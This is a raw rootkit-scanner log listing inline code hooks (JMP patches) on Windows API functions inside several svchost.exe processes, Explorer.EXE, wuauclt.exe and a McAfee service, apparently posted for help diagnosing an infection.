.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00370FAC 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00370F76 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00370011 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00370000 

.text           C:\Windows\system32\svchost.exe[1988] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00370022 

.text           C:\Windows\system32\svchost.exe[1988] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 003C0000 

.text           C:\Windows\system32\svchost.exe[2272] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00150000 

.text           C:\Windows\system32\svchost.exe[2272] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00150025 

.text           C:\Windows\system32\svchost.exe[2272] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00150FE5 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 0010009A 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00100F54 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00100F25 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 001000BC 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00100075 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00100011 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00100FCA 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00100F65 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00100064 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 0010002C 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00100047 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00100FA5 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00100F80 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 001000D7 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00100FDB 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00100000 

.text           C:\Windows\system32\svchost.exe[2272] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 001000AB 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 000B0042 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 000B0027 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 000B0FD2 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 000B000C 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 000B0FC1 

.text           C:\Windows\system32\svchost.exe[2272] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 000B0FEF 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00130F9A 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00130FBC 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00130FEF 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00130FAB 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00130F89 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00130FCD 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00130FDE 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 0013001E 

.text           C:\Windows\system32\svchost.exe[2272] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 0014000A 

.text           C:\Windows\system32\svchost.exe[2520] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 004C0000 

.text           C:\Windows\system32\svchost.exe[2520] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 004C0FD1 

.text           C:\Windows\system32\svchost.exe[2520] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 004C0011 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 002500BA 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 002500A9 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 002500DC 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 002500CB 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 0025006C 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 0025001B 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00250FCA 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 0025008E 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00250F94 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00250047 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00250FA5 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00250036 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 0025007D 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 002500F7 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00250FE5 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00250000 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00250F59 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00240022 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00240FA1 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00240011 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00240000 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00240FB2 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00240FD7 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00260069 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 0026003D 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00260000 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00260058 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00260FAC 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 0026002C 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0026001B 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00260FD1 

.text           C:\Windows\system32\svchost.exe[2520] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 00270FEF 

.text           C:\Windows\System32\svchost.exe[2560] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00090FEF 

.text           C:\Windows\System32\svchost.exe[2560] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 0009002F 

.text           C:\Windows\System32\svchost.exe[2560] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00090014 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00070096 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00070F50 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00070F1A 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 00070F2B 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00070F97 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00070025 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00070FD4 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00070F6B 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00070FB2 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00070FC3 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00070065 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00070040 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00070F7C 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 000700CC 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00070FE5 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00070000 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000700A7 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00060FC8 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00060049 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00060038 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00060000 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00060FE3 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 0006001D 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00080FA1 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00080FC3 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 0008000A 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00080FB2 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00080054 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00080FDE 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00080FEF 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 0008002F 

.text           C:\Windows\Explorer.EXE[3132] ntdll.dll!NtCreateFile                                                                                 778C4224 5 Bytes  JMP 03630000 

.text           C:\Windows\Explorer.EXE[3132] ntdll.dll!NtCreateProcess                                                                              778C42E4 5 Bytes  JMP 03630FE5 

.text           C:\Windows\Explorer.EXE[3132] ntdll.dll!NtProtectVirtualMemory                                                                       778C4B84 5 Bytes  JMP 0363001B 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!GetStartupInfoW                                                                           76B11929 5 Bytes  JMP 032B0F3F 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!GetStartupInfoA                                                                           76B119C9 5 Bytes  JMP 032B0F50 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateProcessW                                                                            76B11BF3 5 Bytes  JMP 032B0F02 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateProcessA                                                                            76B11C28 5 Bytes  JMP 032B0F13 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!VirtualProtect                                                                            76B11DC3 5 Bytes  JMP 032B0071 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateNamedPipeA                                                                          76B12EF5 5 Bytes  JMP 032B0FCA 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateNamedPipeW                                                                          76B15C0C 5 Bytes  JMP 032B0025 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreatePipe                                                                                76B38E6E 5 Bytes  JMP 032B0F61 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!LoadLibraryExW                                                                            76B39109 5 Bytes  JMP 032B0F8D 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!LoadLibraryW                                                                              76B39362 5 Bytes  JMP 032B0040 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!LoadLibraryExA                                                                            76B394B4 5 Bytes  JMP 032B0FA8 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!LoadLibraryA                                                                              76B394DC 5 Bytes  JMP 032B0FB9 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!VirtualProtectEx                                                                          76B3DBDA 5 Bytes  JMP 032B0F72 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!GetProcAddress                                                                            76B5903B 5 Bytes  JMP 032B00AA 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateFileW                                                                               76B5AECB 5 Bytes  JMP 032B0000 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateFileA                                                                               76B5CE5F 5 Bytes  JMP 032B0FEF 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!WinExec                                                                                   76BA5CF7 5 Bytes  JMP 032B0F2E 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegCreateKeyExA                                                                           770539AB 5 Bytes  JMP 03320FC0 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegCreateKeyA                                                                             77053BA9 5 Bytes  JMP 03320047 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegOpenKeyA                                                                               770589C7 5 Bytes  JMP 03320000 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegCreateKeyW                                                                             7706391E 5 Bytes  JMP 03320062 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegCreateKeyExW                                                                           770641F1 5 Bytes  JMP 0332007D 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegOpenKeyExA                                                                             77067C42 5 Bytes  JMP 0332001B 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegOpenKeyW                                                                               7706E2B5 5 Bytes  JMP 03320FE5 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegOpenKeyExW                                                                             77077BA1 5 Bytes  JMP 0332002C 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_wsystem                                                                                    75807F2F 5 Bytes  JMP 032A0075 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!system                                                                                      7580804B 5 Bytes  JMP 032A0064 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_creat                                                                                      7580BBE1 5 Bytes  JMP 032A002E 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_open                                                                                       7580D106 5 Bytes  JMP 032A000C 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_wcreat                                                                                     7580D326 5 Bytes  JMP 032A0053 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_wopen                                                                                      7580D501 5 Bytes  JMP 032A001D 

.text           C:\Windows\Explorer.EXE[3132] WS2_32.dll!socket                                                                                      772936D1 5 Bytes  JMP 0338000A 

.text           C:\Windows\Explorer.EXE[3132] WININET.dll!InternetOpenA                                                                              76F34E2B 5 Bytes  JMP 03300000 

.text           C:\Windows\Explorer.EXE[3132] WININET.dll!InternetOpenUrlA                                                                           76F3BFCE 5 Bytes  JMP 03300036 

.text           C:\Windows\Explorer.EXE[3132] WININET.dll!InternetOpenW                                                                              76F6C03E 5 Bytes  JMP 0330001B 

.text           C:\Windows\Explorer.EXE[3132] WININET.dll!InternetOpenUrlW                                                                           76F9D722 5 Bytes  JMP 03300FE5 

.text           C:\Program Files\Common Files\Mcafee\McSvcHost\McSvHost.exe[3172] kernel32.dll!LoadLibraryW                                          76B39362 5 Bytes  JMP 6E4C9AE2 C:\Program Files\Common Files\McAfee\McProxy\mcproxy.dll (McAfee Proxy Service Module/McAfee, Inc.)

.text           C:\Program Files\Common Files\Mcafee\McSvcHost\McSvHost.exe[3172] kernel32.dll!LoadLibraryA                                          76B394DC 5 Bytes  JMP 6E4C9A20 C:\Program Files\Common Files\McAfee\McProxy\mcproxy.dll (McAfee Proxy Service Module/McAfee, Inc.)

.text           C:\Windows\system32\svchost.exe[4576] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00040FEF 

.text           C:\Windows\system32\svchost.exe[4576] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00040025 

.text           C:\Windows\system32\svchost.exe[4576] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00040014 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00010F5C 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00010F77 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 000100E2 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 00010F4B 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00010084 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00010FCA 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 0001001B 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00010F88 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00010073 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00010051 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00010062 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00010036 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00010F99 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 000100FD 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00010FE5 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00010000 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000100C7 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00060FAB 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00060036 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00060011 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00060000 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00060FC6 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00060FE3 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 0007005B 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00070FD4 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00070000 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00070FC3 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 0007006C 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00070FEF 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00070025 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 0007004A 

.text           C:\Windows\system32\svchost.exe[4576] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 00080000 

.text           C:\Windows\system32\wuauclt.exe[4900] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 0004000A 

.text           C:\Windows\system32\wuauclt.exe[4900] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00040FDE 

.text           C:\Windows\system32\wuauclt.exe[4900] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00040FEF 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 000100A2 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00010087 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 000100F3 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 000100CE 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00010F77 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00010FDB 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00010FCA 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00010076 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00010051 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00010FA5 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00010F94 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00010036 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00010F66 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 00010104 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 0001001B 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 0001000A 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000100BD 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00070FAD 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00070FBE 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00070FE3 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00070000 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00070038 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 0007001D 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00080FA8 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00080FCA 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00080FEF 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00080FB9 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00080F97 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 0008001B 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0008000A 

